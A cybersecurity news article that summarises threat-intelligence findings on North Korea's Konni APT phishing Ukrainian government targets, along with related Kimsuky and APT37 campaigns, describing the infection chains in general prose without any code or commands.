North Korean Konni APT Leverages Malware to Monitor Developments in the Russian Invasion of Ukraine

The North Korean threat actor known as Konni APT has recently been implicated in a phishing campaign targeting government entities in Ukraine, expanding its focus beyond previous targets in Russia. This shift suggests a strategic interest in gathering intelligence related to the ongoing Russian invasion, as reported by enterprise security firm Proofpoint. Researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly noted that this group’s activities have historically involved the collection of strategic intelligence, particularly concerning government entities.

Konni APT, also referred to as Opal Sleet, Osmium, TA406, or Vedalia, is a cyber espionage group that has been operational since at least 2014. It has a documented history of targeting various entities across South Korea, the United States, and Russia. The group commonly employs phishing emails to distribute its malware, specifically Konni RAT (also known as UpDog), while also leading recipients to credential harvesting websites. An earlier analysis published in November 2021 by Proofpoint identified TA406 as one of several entities involved in activities associated with the Kimsuky, Thallium, and Konni Group.

The current wave of attacks has involved phishing emails that simulate correspondence from a fictitious senior fellow at the non-existent Royal Institute of Strategic Studies. The messages direct targets to a password-protected RAR archive hosted on the MEGA cloud service. Opening the archive using a password provided in the email initiates a series of actions designed to extensively monitor the compromised systems.

Contained within the RAR archive is a CHM file featuring fabricated content regarding former Ukrainian military leader Valeriy Zaluzhnyi. When clicked, the CHM file executes a PowerShell command that establishes a connection with an external server to download further malicious payloads. This PowerShell script has the capability to execute commands that collect system information, encode it in Base64, and transmit it to the threat actor’s server.

Remarkably, if the initial phishing attempts fail, the actor has sent multiple follow-up emails over consecutive days, inquiring whether the recipient received the earlier messages and urging them to download the files. Additionally, Proofpoint has identified the distribution of an HTML file directly attached to some phishing emails, instructing victims to click on an embedded link, which triggers the download of a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file. Executing the LNK file results in the running of Base64-encoded PowerShell commands that deploy a Javascript Encoded file named “Themes.jse,” which subsequently communicates with a remote server to execute further malicious instructions. The specific nature of these payloads remains undetermined at this time.

Moreover, TA406 has targeted Ukrainian government entities by sending counterfeit Microsoft security alert messages via ProtonMail accounts, alerting them to suspicious sign-in activity from U.S.-based IP addresses and prompting verification through embedded links. Although the credential harvesting page associated with these alerts has yet to be identified, a compromised domain previously used for collecting sensitive information, such as Naver login credentials, has surfaced.

These credential harvesting initiatives occurred before the malware deployment attempts and were aimed at users who received the HTML delivery campaign. Researchers suggest that TA406 is likely focused on intelligence gathering to gauge the current risks to North Korean forces involved in the conflict, as well as assessing the likelihood of Russia seeking additional military support.

In contrast to Russian threat groups that may be focused on tactical battlefield intelligence, TA406 has historically concentrated on broader strategic political intelligence.

Recent disclosures indicate that the Konni group has also been linked to an advanced multi-stage malware campaign aimed at South Korean entities, involving ZIP archives containing LNK files that deploy PowerShell scripts responsible for extracting a CAB archive, eventually leading to the installation of batch script malware capable of exfiltrating sensitive data to remote servers.

On a related note, cybersecurity firm AhnLab reported that Kimsuky has employed PEBBLEDASH within multi-stage infection sequences initiated through spear-phishing, aligning with observed tactics that leverage LNK files during the initial attack phases. This malware has been previously associated with the Lazarus Group.

A broader analysis indicates that Konni and Kimsuky are not alone in their focus on South Korea. In March 2025, a campaign attributed to APT37, also known as ScarCruft, targeted activists concerned with North Korean issues. Dubbed Operation ToyBox Story, this spear-phishing operation utilized an email containing a Dropbox link to a malicious shortcut file. This shortcut was engineered to execute a decoy file while simultaneously launching a sequence of payloads leading to the deployment of RoKRAT, malware linked to APT37.

RokRAT is designed to gather system data, capture screenshots, and utilize various cloud services for command-and-control operations. This incident underscores the persistent threats posed by North Korean cyber actors, who continue to adapt their attack methodologies, utilizing legitimate cloud infrastructure while focusing on stealthy techniques to evade detection by existing cybersecurity measures.